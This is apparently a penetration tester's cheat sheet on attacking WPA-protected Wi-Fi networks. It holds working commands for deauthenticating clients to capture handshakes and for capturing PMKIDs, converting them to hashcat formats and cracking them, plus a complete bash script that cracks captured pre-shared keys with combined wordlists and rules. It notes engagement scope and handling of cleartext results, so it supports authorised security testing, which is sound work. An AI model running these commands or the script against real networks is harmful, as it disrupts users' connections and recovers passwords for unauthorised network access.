WPA
Standard approach - No roaming
info
airodump-ng must be locked on the AP's channel and filtered on its BSSID before you deauthenticate; otherwise the 4-way handshake is not captured and the deauth only disrupts the client.
Deauthenticate a supplicant
aireplay-ng -0 20 -a <ap_mac> -c <supplicant_mac> <wlan1mon>
tip
- airodump-ng should display "WPA handshake: <ap_mac>" (top right) once the 4-way handshake has been captured. Without that indication the capture cannot be cracked.
Roaming - PMKID attack
tip
It only works against APs that include a PMKID in the first EAPOL frame (roaming / 802.11r-capable APs). Unlike the standard approach it is clientless: no connected supplicant and no deauthentication are needed.
Installation
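# Build hcxdumptool and hcxtools from source on the capture box.
# Supply-chain note: the clones below track the upstream default branch and
# `make install` copies the binaries into system paths as root. For a
# reproducible image, check out a release tag (and compare its commit hash with
# the upstream release page) before building. Newer releases have also renamed
# some options and tools used further down this page (e.g. hcxpcaptool was
# superseded by hcxpcapngtool) -- check `--help` of the version you built.
set -e   # stop at the first failed step instead of cd'ing into a missing directory

apt install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev

cd /opt
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
make install

cd /opt
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
make install

cd /opt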
Attack
1. Traffic capture
Opportunistic capture without a BSSID filter: this collects PMKIDs from every AP in range, so only use it where every network in range is in scope of the engagement.
hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filtermode=2 --enable_status=3
Target one or more BSSIDs
info
<mac.txt> contains one BSSID per line, written without separators. Example: 50D72257AC2F
hcxdumptool -o <pmkid.pcap> -i <wlan1mon> --filterlist=<mac.txt> --filtermode=2 --enable_status=3
2. PCAP to hashes
hcxpcaptool -z <out.hashes> <pmkid.pcap>
3. Crack
info
hashcat mode 2500 is WPA-EAPOL-PBKDF2 (hccapx format, built from a captured 4-way handshake with `hcxpcaptool -o`); mode 16800 is WPA-PMKID-PBKDF2 (built with `hcxpcaptool -z`). Recent hashcat releases merge both into mode 22000 (WPA-PBKDF2-PMKID+EAPOL) -- check `hashcat --help` for the modes your version accepts.
hcxpcaptool -o <hccapx.hashes> <pmkid.pcap>
4-way handshake to hashes
info
WPA-PMKID-PBKDF2 (16800)
hcxpcaptool -z <out.hashes> <pmkid.pcap>
cat *.hashes > all_psk.hashes
info
WPA-EAPOL-PBKDF2 (2500) -- hccapx output for a captured 4-way handshake
/usr/lib/hashcat-utils/cap2hccapx.bin <pcap.pcap> <ESSID.hccapx> [<ESSID>]
cat *.hccapx > all.hccapx
Cracking with a crackstation
info
Script that automates the cracking of WPA hashes captured via the PMKID attack (mode 16800) or a 4-way handshake (mode 2500). Candidate generation is based on patterns seen in real enterprise PSKs: custom words combined with each other, capitalised, joined by separators and mangled with rules. The potfile it writes contains cleartext PSKs -- protect it and dispose of it like any other engagement evidence.
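#!/usr/bin/env bash
# pskraken.sh - crack WPA PSK hashes with wordlists derived from patterns of
# known enterprise PSKs (word combinations, case variants, separators, rules).
#
# Usage:   time ./pskraken.sh <hashcat_mode> [hashes_file]
#   hashcat_mode  16800 (PMKID, output of `hcxpcaptool -z`) or 2500 (hccapx).
#                 Newer hashcat releases fold both into 22000; pass whatever
#                 `hashcat --help` lists for the hash file you have.
#   hashes_file   defaults to out.hashes (the historical hard-coded name).
#
# Inputs expected in the current directory:
#   lower_dico.txt  custom wordlist, one word per line, first letter lowercase
#   separator.txt   one separator per line; each must be a single character,
#                   because the hashcat rule `$X` appends exactly one character
#
# Outputs: intermediate *_dico.txt / *_separated*.txt wordlists and out.pot in
# the current directory. out.pot holds cleartext PSKs -- treat it as engagement
# evidence: restrict its permissions and delete it when the engagement ends.
#
# Tool locations can be overridden through the environment; the defaults are
# the original crackstation paths.

set -u   # unset variables are bugs. -e is deliberately NOT set: hashcat exits 1
         # when a run is exhausted without cracking every hash, which is normal here.

HASHCAT_UTILS="${HASHCAT_UTILS:-/var/app/hashcat-utils/bin}"
RULES_DIR="${RULES_DIR:-/var/rules}"
DICO_DIR="${DICO_DIR:-/var/dico/Small}"

die() { printf 'pskraken: %s\n' "$*" >&2; exit 1; }

mode="${1:-}"
hashes="${2:-out.hashes}"
potfile="out.pot"
combinator="$HASHCAT_UTILS/combinator.bin"

[[ "$mode" =~ ^[0-9]+$ ]] || die "usage: $0 <hashcat_mode (16800|2500)> [hashes_file]"
[[ -s lower_dico.txt ]] || die "lower_dico.txt is missing or empty"
[[ -s separator.txt ]]  || die "separator.txt is missing or empty"
[[ -s "$hashes" ]]      || die "hash file '$hashes' is missing or empty"
[[ -x "$combinator" ]]  || die "combinator.bin not found in $HASHCAT_UTILS"
command -v hashcat >/dev/null || die "hashcat is not in PATH"

# Separators: one per line, exactly one character, never '/' (it ends up in file
# names). Blank lines are skipped; the old `for s in $(cat ...)` also glob-expanded
# separators such as '*' or '?', which this loop does not.
separators=()
while IFS= read -r sep || [[ -n "$sep" ]]; do
  [[ -n "$sep" ]] || continue
  (( ${#sep} == 1 )) || die "separator '$sep' is not a single character"
  [[ "$sep" != "/" ]] || die "'/' cannot be used as a separator"
  separators+=("$sep")
done < separator.txt
(( ${#separators[@]} > 0 )) || die "separator.txt contains no usable separator"

# Crack the hash file with candidates read from stdin (fed by `hashcat --stdout`
# or combinator.bin).
crack_stdin() {
  hashcat -m "$mode" --potfile-path "$potfile" "$hashes"
}

# Crack the hash file with a wordlist; extra arguments (e.g. -r rule) pass through.
crack_wordlist() {
  local dico="$1"; shift
  hashcat -m "$mode" --potfile-path "$potfile" "$hashes" "$dico" "$@"
}

# Upper-case the first letter of every word (GNU sed \U).
sed 's/^\(.\)/\U\1/' lower_dico.txt > upper_dico.txt

## Combine
echo "Combining..."
"$combinator" lower_dico.txt lower_dico.txt > ll_dico.txt
"$combinator" lower_dico.txt upper_dico.txt > lu_dico.txt
"$combinator" upper_dico.txt lower_dico.txt > ul_dico.txt
"$combinator" upper_dico.txt upper_dico.txt > uu_dico.txt
cat ll_dico.txt lu_dico.txt ul_dico.txt uu_dico.txt | sort -u > concatenated.txt  # Wifikey KeyWifi
"$combinator" ll_dico.txt lower_dico.txt > lll_dico.txt  # wifikeymobile
"$combinator" ul_dico.txt lower_dico.txt > ull_dico.txt  # Wifikeymobile
"$combinator" uu_dico.txt upper_dico.txt > uuu_dico.txt  # WifiKeyMobile

## Separator
echo "Separating..."
for sep in "${separators[@]}"; do
  # -j '$X' appends the separator to every left-hand word before combining.
  hashcat -a 1 upper_dico.txt lower_dico.txt -j "\$${sep}" --stdout > "ul_separated${sep}.txt"               # Wifi-key
  hashcat -a 1 upper_dico.txt upper_dico.txt -j "\$${sep}" --stdout > "uu_separated${sep}.txt"               # Wifi-Key
  hashcat -a 1 lower_dico.txt lower_dico.txt -j "\$${sep}" --stdout > "ll_separated${sep}.txt"               # wifi-key
  hashcat -a 1 upper_dico.txt "uu_separated${sep}.txt" -j "\$${sep}" --stdout > "uuu_separated${sep}.txt"    # Wifi-Key-Mobile
  echo "[+] Separated with ${sep}"
done

## Cracking
echo "Quick Win Cracking"
quick_dicos=(lower_dico.txt upper_dico.txt concatenated.txt lll_dico.txt ull_dico.txt uuu_dico.txt)
for dico in "${quick_dicos[@]}"; do
  hashcat --stdout "$dico" \
      -r "$RULES_DIR/OneRuleToRuleThemAll.rule" \
      -r "$RULES_DIR/append-year-n-bang-or-plus.rule" \
      -r "$RULES_DIR/leetspeak.rule" | crack_stdin
done

echo "Cracking with separators"
for sep in "${separators[@]}"; do
  for prefix in uu ul ll uuu; do
    hashcat --stdout "${prefix}_separated${sep}.txt" -r "$RULES_DIR/best64.rule" | crack_stdin
  done
  for prefix in uu ul ll uuu; do
    hashcat --stdout "${prefix}_separated${sep}.txt" \
        -r "$RULES_DIR/append-year-n-bang-or-plus.rule" \
        -r "$RULES_DIR/leetspeak.rule" | crack_stdin
  done
done

echo "Cracking 8 digits long"
# Quoted so the shell never glob-expands the mask against files in the cwd.
hashcat -a 3 -m "$mode" --potfile-path "$potfile" "$hashes" '?d?d?d?d?d?d?d?d'

echo "Cracking based on english and french wordlists"
for lang_dico in "$DICO_DIR/english.txt" "$DICO_DIR/french.txt"; do
  for rule in best64 leetspeak append-year-n-bang-or-plus; do
    crack_wordlist "$lang_dico" -r "$RULES_DIR/${rule}.rule"
  done
done
"$combinator" lower_dico.txt "$DICO_DIR/english.txt" | crack_stdin
"$combinator" lower_dico.txt "$DICO_DIR/french.txt"  | crack_stdin

echo "Cracking based on specific wordlists"
for dico in "$DICO_DIR"/{rkg,cow,cnets,rockyou}.txt; do
  crack_wordlist "$dico" -r "$RULES_DIR/best64.rule"
  crack_wordlist "$dico" -r "$RULES_DIR/leetspeak.rule"
done
hashcat --stdout uuu_dico.txt -r "$RULES_DIR/OneRuleToRuleThemAll.rule" | crack_stdin

## Result
echo "Final Result:"
cat "$potfile"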
Cracking without a crackstation
Aircrack
aircrack-ng -w <dico> <cap.pcap>
Rainbow tables - cowpatty
genpmk -f <dico> -d <computed_hashes.txt> -s <essid>
cowpatty -r <cap.pcap> -d <computed_hashes.txt> -2 -s <essid>
GPU - pyrit
pyrit eval
pyrit -i <dico> import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r <cap.pcap> -b <ap_mac> attack_db
rm -r ~/.pyrit/blobspace
GPU - hashcat
hashcat64.exe -m 2500 -r rules\best64.rule cap\capture.hccapx dict\custom_dict.txt